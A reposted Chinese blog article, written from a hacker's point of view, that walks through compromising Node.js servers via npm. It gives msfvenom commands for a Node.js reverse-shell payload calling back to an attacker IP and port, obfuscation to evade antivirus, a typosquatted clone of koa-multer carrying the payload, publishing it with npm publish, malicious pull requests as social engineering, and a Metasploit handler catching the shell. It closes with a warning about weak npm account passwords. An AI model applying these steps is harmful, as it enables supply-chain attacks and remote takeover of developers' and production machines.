我是这样黑进你Node.js生产服务器的

栏目: Node.js · 发布时间: 6年前

内容简介:这篇文章讲述了从一个黑客的角度,以渗透前端项目为目标,从生成 payload,混淆,隐藏 payload,发布 npm,社会工程学提 PR,运行脚本,反向连接到攻击主机,最终主机拿到服务器 shell 的故事。前端工程师的口头禅是啥?npm install!这个命令从 npm 仓库中下载一堆从项目 package.json 中声明的依赖,下载完依赖后,再下载依赖中 package.json 声明的依赖,下载完依赖的依赖后,再下载依赖中 package.json 声明的依赖中的 package.json 声

这篇文章讲述了从一个黑客的角度,以渗透前端项目为目标,从生成 payload,混淆,隐藏 payload,发布 npm,社会工程学提 PR,运行脚本,反向连接到攻击主机,最终主机拿到服务器 shell 的故事。

正片:

前端工程师的口头禅是啥?npm install!

这个命令从 npm 仓库中下载一堆从项目 package.json 中声明的依赖,下载完依赖后,再下载依赖中 package.json 声明的依赖,下载完依赖的依赖后,再下载依赖中 package.json 声明的依赖中的 package.json 声明的依赖,下载完依赖后…………

然后下了一堆你都不知道从哪里来的 npm 包。

我是这样黑进你Node.js生产服务器的

前端工程师的另一个口头禅是什么?npm run dev!

嗯!界面显示 compile successful!很完美的一次编译!你觉得是时候展示真正的技术了!

此时,在网线的另一端,一个黑客微微一笑:又有一个肉鸡上线了。

这中间都发生了什么?

生成 Payload

经验丰富的金鱼佬都知道,要钓鱼,是肯定要先做鱼钩的。黑客也要钓鱼,鱼钩是啥?在黑客的世界里,有一个鱼钩店,叫做 msfvenom,专治各种款(架)式(构),各种型(语)号(言)的鱼(机器)。msfvenom 是 metasploit 的一部分,集成在了 Kali 系统里面。在 Kali 的官网,有现成的虚拟机镜像,下载了就能用。

在 Kali 的 Terminal 里输入:

msfvenom -l | grep node

可以列出所有支持 Node.js 的 payload。这相当于到店里问:老板!我要买鱼钩!要能钓 Node.js 的那种!老板:好嘞!要哪款?

我是这样黑进你Node.js生产服务器的

在这里,我们选择 nodejs/shell_reverse_tcp,其实业界最常用的 payload 是 meterpreter,但是这款鱼钩 还没上市

如何生成我们的 payload 呢,输入:

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.199.165 LPORT=5432 -o index.js

这里说一下配置的参数:

  • -p nodejs/shell_reverse_tcp 指的是我们要用 nodejs/shell_reverse_tcp 这个 payload。
  • LHOST=192.168.199.165 指的是攻击主机的 IP 地址,由于这次攻击是内网演示,所以用了内网 IP。公网攻击的话,就要配个公网 IP。
  • LPORT=5432 攻击主机这边的监听端口,payload 运行后,被攻击方会尝试连接攻击主机的这个端口。
  • -o index.js 意思是输出到 index.js 这个文件中。

敲完命令之后,我们可以在当前目录拿到一个名为 index.js 的 payload,也就是我们刚买到的鱼钩。payload 很小很小,只有 803 字节。用

cat index.js

命令,可以看到 payload 长什么样。

我是这样黑进你Node.js生产服务器的

这时候警觉的前端就会跳出来讲:胸底,你这代码里又调用 cmd 又调用 /bin/sh,还把攻击 IP 和端口都暴露出来了,傻子才会运行你的代码哦?

别急嘛,好戏才刚刚开始。

混淆

传统的杀毒软件,是通过检测文件特定字符来确定病毒特征的,而通过修改特征码绕过杀毒软件的检测,我们称之为免杀。

而 JavaScript 的变化,简直比海贼王里的路飞还要伸缩自如。

举个例子,一行简单的代码:

alert(1)

用jsfuck 能把它变得连老妈都认不出来:

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
复制代码

当然我们不用 jsfuck,因为混淆过后的代码太大了。

前端喜欢用 UglifyJS 来压缩代码,但在这场景下,也许不是最优解。我们用 JavaScript Obfuscator Tool。

复制 payload,打开obfuscator.io/ ,粘贴,根据你的口味选择需要添加的混淆方法,点击 Obfuscate,一道菜就完成了。

我是这样黑进你Node.js生产服务器的

现在已经没有人类能读懂这段代码了,混淆任务完成。

隐藏 payload

npm 是共产主义的大粮仓,任何人都可以贡献自己的代码到 npm 上去。但是如何让别人下载我们的代码呢?这是一门高深的学问。

常规的思路是,做一个和正常 npm 包名字很像的包名,譬如 koa-multer,可以做一个 koa_multer,然后总有一些人会打错字,下载到包含 payload 的包。这是一个概率问题,下载 koa-multer 的总量越大,下载 koa_multer 的量也越大。

以 koa-multer 为例,我们先把代码 clone 下载下来。

git clone github.com/koa-modules…

把我们生成的 payload 复制到项目路径下,并在 index.js 中引入这个文件。

把 package.json 和README.md 里所有的 koa-multer 改成 koa_multer,并在 package.json 的 files 声明 payload 的文件名,我们就做好了一个带有 payload 的 npm 包。

拿到这个包,就可以发布到 npm 源了:

npm publish

为了演示,我在本地搭了一个 npm 服务器。

我是这样黑进你Node.js生产服务器的

可以看到这个包和正确的 koa-multer 几乎一样。如果不深究源码,前端不会发现自己下载了一个错误的包。

我是这样黑进你Node.js生产服务器的

接下来要做的事情是,等。就像钓鱼一样,需要耐心。

这时候警觉的前端工程师会跳出来说:你这包一看就知道是坑人的,我肯定不会蠢到安装这种包!

别急,还有其他方法。

另一个思路是,做一个通用的 npm 包,譬如能 log 出五彩斑斓颜色的包,然后去给其他的开源项目提 PR:

我帮你修复了问题 XXX,还加上了彩色 logger 的功能!

我们是在给开源社区做贡献呐!

当然,警觉的人会拒绝这个 PR。但这也没关系,提的 PR 多了,总会有人上钩的。

一个 npm 包被伪造不是问题,一个恶意的 PR 被不知名的项目 Approve 也不是问题。就像一个请求不能叫攻击,但是几百万的请求打过来的时候,你就知道 DDOS 有多可怕。

黑客完全可以把下载 npm 包,伪造代码并发布这段逻辑自动化。之后,就不仅仅是 koa_multer 的问题了,你需要提防 koa-multe,multer-koa,koa-multer-middleware 等等各种奇奇怪怪的 npm 包,还要区分"_"和"-"的区别,当然,也不仅仅是 koa-multer 这个包,其他所有的包都可以如法炮制。

就算再警觉,再小心,总有你注意不到的地方。就像刀剑不入的阿喀琉斯,也会有脚后跟中箭的一天。

另外,大多数 npm 包都是层级依赖关系,你能确保你的 package.json 中不可能声明有木马的包,但是你能确保你所依赖的包,这些包的作者,也和你一样警觉,不会大意?

黑客准备

黑客这边,需要准备好 handler。

输入:

msfconsole

进入metasploit的控制台。然后输入:

use exploit/multi/handler

使用 handler 模块。并在 handler 模块中设置 payload,攻击主机 IP,攻击主机端口,并启动监听:

set payload nodejs/shell_reverse_tcp set LHOST 192.168.199.165 set LPORT 5432 run

如图,反向TCP监听已经成功启动:

我是这样黑进你Node.js生产服务器的

肉鸡上线

这时候,小白鼠跑了 koa_multer 里的 demo 代码!

我是这样黑进你Node.js生产服务器的

黑客这边,马上能获得这个 shell 的会话:

我是这样黑进你Node.js生产服务器的

在这里,黑客获得了启动该 Node.js 程序的用户权限,可以执行任何该用户允许执行的命令。譬如查看操作系统,查看 CPU 型号………

sw_vers # 查看操作系统

sysctl -n machdep.cpu.brand_string # 查看操作系统

我是这样黑进你Node.js生产服务器的

如果这个程序部署到了生产环境服务器,那么黑客将能获得这个服务器的shell权限。

内网渗透,脱裤,种马,导流……拿到 shell 真的可以为所欲为。

Done?

还没完呢,精彩还在后头。

npm 账号的弱口令问题

在 2017 年 7 月份,有人对 npm 的账号做了一次弱口令检测,检测结果是:

有弱口令问题账号所发布的 npm 包,占据了整站的 14%。

由于 npm 包的存在形式相互依赖,由这 14% 的包引发的安全问题,影响到其他的包,占据了整站的 54%。

那就意味着,你每 npm install 两次,就会有一次安装到不安全的包。这不是危言耸听。大名鼎鼎 koa.js,发布的密码是 "password";react、gulp 等明星项目也不能幸免。下面列举一些其他受弱口令问题影响的 npm 包,相信总有你熟悉的名字:

  1. debug
  2. qs
  3. yargs
  4. request
  5. chalk
  6. form-data
  7. cheerio
  8. gulp
  9. browserify
  10. bower
  11. mongoose
  12. electron
  13. normalize.css
  14. mysql

npm 到现在都没发生过大规模的安全性问题,纯属是运气好。

所以,让我们祝愿 npm 永远幸运吧。


以上所述就是小编给大家介绍的《我是这样黑进你Node.js生产服务器的》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

你必须知道的495个C语言问题

你必须知道的495个C语言问题

Steve Summit / 孙云、朱群英 / 人民邮电出版社 / 2009-2 / 45.00元

“本书是Summit以及C FAQ在线列表的许多参与者多年心血的结晶,是C语言界最为珍贵的财富之一。我向所有C语言程序员推荐本书。” ——Francis Glassborow,著名C/C++专家,ACCU(C/C++用户协会)前主席 “本书清晰阐明了Kernighan与Ritchie《The C programming Language》一书中许多简略的地方,而且精彩地总结了C语言编程......一起来看看 《你必须知道的495个C语言问题》 这本书的介绍吧!

URL 编码/解码
URL 编码/解码

URL 编码/解码

html转js在线工具
html转js在线工具

html转js在线工具

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具